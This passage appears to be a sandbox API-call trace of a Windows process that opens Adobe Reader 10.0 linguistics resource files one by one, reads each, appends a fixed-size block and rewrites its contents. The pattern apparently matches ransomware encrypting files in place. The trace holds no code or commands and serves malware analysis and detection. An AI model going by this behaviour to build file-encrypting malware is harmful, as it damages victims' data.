SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.617] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x51c [0092.617] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.617] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.617] ReleaseMutex (hMutex=0x168) returned 1 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.617] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dut.fca", cchWideChar=7, lpMultiByteStr=0x1f7ac0c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dut.fca", lpUsedDefaultChar=0x0) returned 7 [0092.617] ReadFile (in: hFile=0x204, lpBuffer=0x1f3d8e8, nNumberOfBytesToRead=0x51c, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3d8e8*, lpNumberOfBytesRead=0x345f2bc*=0x51c, lpOverlapped=0x0) returned 1 [0092.626] SetFilePointer (in: hFile=0x204, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0092.626] WriteFile (in: hFile=0x204, lpBuffer=0x1e93878*, nNumberOfBytesToWrite=0xaa4, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e93878*, lpNumberOfBytesWritten=0x345f2d0*=0xaa4, lpOverlapped=0x0) returned 1 [0092.626] CloseHandle (hObject=0x204) returned 1 [0092.626] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\est.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\est.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.662] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.663] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x4000 [0092.663] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.663] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.663] ReleaseMutex (hMutex=0x168) returned 1 [0092.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.663] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="est.hyp", cchWideChar=7, lpMultiByteStr=0x1f7a9cc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="est.hyp", lpUsedDefaultChar=0x0) returned 7 [0092.663] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.671] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3000 [0092.671] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.672] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x3000 [0092.672] WriteFile (in: hFile=0x1ec, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.673] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0092.673] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.673] CloseHandle (hObject=0x1ec) returned 1 [0092.673] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\frn.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\frn.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.673] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.674] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x6f4 [0092.674] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.674] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.674] ReleaseMutex (hMutex=0x168) returned 1 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn.fca", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0092.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="frn.fca", cchWideChar=7, lpMultiByteStr=0x1f7a9cc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="frn.fca", lpUsedDefaultChar=0x0) returned 7 [0092.674] ReadFile (in: hFile=0x1ec, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x6f4, lpNumberOfBytesRead=0x345f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x345f2bc*=0x6f4, lpOverlapped=0x0) returned 1 [0092.676] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f300*=0) returned 0x0 [0092.676] WriteFile (in: hFile=0x1ec, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0xc7c, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x345f2d0*=0xc7c, lpOverlapped=0x0) returned 1 [0092.676] CloseHandle (hObject=0x1ec) returned 1 [0092.676] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\gre32.clx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\gre32.clx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.679] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.679] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7fe1 [0092.679] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.679] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.679] ReleaseMutex (hMutex=0x168) returned 1 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre32.clx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0092.679] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="gre32.clx", cchWideChar=9, lpMultiByteStr=0x1f7342c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="gre32.clx", lpUsedDefaultChar=0x0) returned 9 [0092.679] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.681] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6fe1 [0092.681] ReadFile (in: hFile=0x1ec, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0092.682] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6fe1 [0092.682] WriteFile (in: hFile=0x1ec, lpBuffer=0x2667c68*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2667c68*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0092.683] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0092.683] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a58*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0092.683] CloseHandle (hObject=0x1ec) returned 1 [0092.683] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\heb134.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\heb134.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0092.684] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.684] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0xb47de [0092.684] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0092.684] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0092.684] ReleaseMutex (hMutex=0x168) returned 1 [0092.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb134.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0092.684] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="heb134.hsp", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="heb134.hsp", lpUsedDefaultChar=0x0) returned 10 [0092.684] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0095.692] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.693] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xb37de [0095.693] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0095.695] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0xb37de [0095.695] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0095.695] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0095.695] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0095.696] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0095.696] CloseHandle (hObject=0x1ec) returned 1 [0097.202] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\hun109.hsp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\hun109.hsp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.909] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x9eeb8 [0097.910] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.910] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.910] ReleaseMutex (hMutex=0x168) returned 1 [0097.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun109.hsp", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.910] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="hun109.hsp", cchWideChar=10, lpMultiByteStr=0x1f7340c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="hun109.hsp", lpUsedDefaultChar=0x0) returned 10 [0097.910] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0xf000, lpOverlapped=0x0) returned 1 [0097.931] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.948] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9deb8 [0097.948] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.954] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x9deb8 [0097.954] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.955] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.955] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0xf000, lpOverlapped=0x0) returned 1 [0097.956] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.956] CloseHandle (hObject=0x1cc) returned 1 [0097.956] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\lav135.lex" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\lav135.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x2d000 [0097.959] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.959] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.959] ReleaseMutex (hMutex=0x168) returned 1 [0097.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav135.lex", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0097.959] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lav135.lex", cchWideChar=10, lpMultiByteStr=0x1f7362c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lav135.lex", lpUsedDefaultChar=0x0) returned 10 [0097.959] ReadFile (in: hFile=0x1cc, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x345f278*=0x8000, lpOverlapped=0x0) returned 1 [0097.962] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c000 [0097.962] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.965] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x2c000 [0097.965] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.966] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.966] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x345f28c*=0x8000, lpOverlapped=0x0) returned 1 [0097.966] CloseHandle (hObject=0x1cc) returned 1 [0097.966] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\nrw.hyp" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\nrw.hyp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0097.968] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.968] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x7c00 [0097.969] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f8c0*=0) returned 0x0 [0097.969] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0097.969] ReleaseMutex (hMutex=0x168) returned 1 [0097.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw.hyp", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0097.969] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="nrw.hyp", cchWideChar=7, lpMultiByteStr=0x1f7ac3c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nrw.hyp", lpUsedDefaultChar=0x0) returned 7 [0097.969] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.971] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6c00 [0097.972] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x345f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x345f278*=0x1000, lpOverlapped=0x0) returned 1 [0097.975] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x345f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x345f2e8*=0) returned 0x6c00 [0097.975] WriteFile (in: hFile=0x1cc, lpBuffer=0x2665868*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x2665868*, lpNumberOfBytesWritten=0x345f28c*=0x1588, lpOverlapped=0x0) returned 1 [0097.976] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x345f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x345f2bc*=0) returned 0x0 [0097.976] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x345f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x345f28c*=0x1000, lpOverlapped=0x0) returned 1 [0097.976] CloseHandle (hObject=0x1cc) returned 1 [0097.977] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\Providers\\Proximity\\11.00\\pol.fca" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\providers\\proximity\\11.00\\pol.fca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 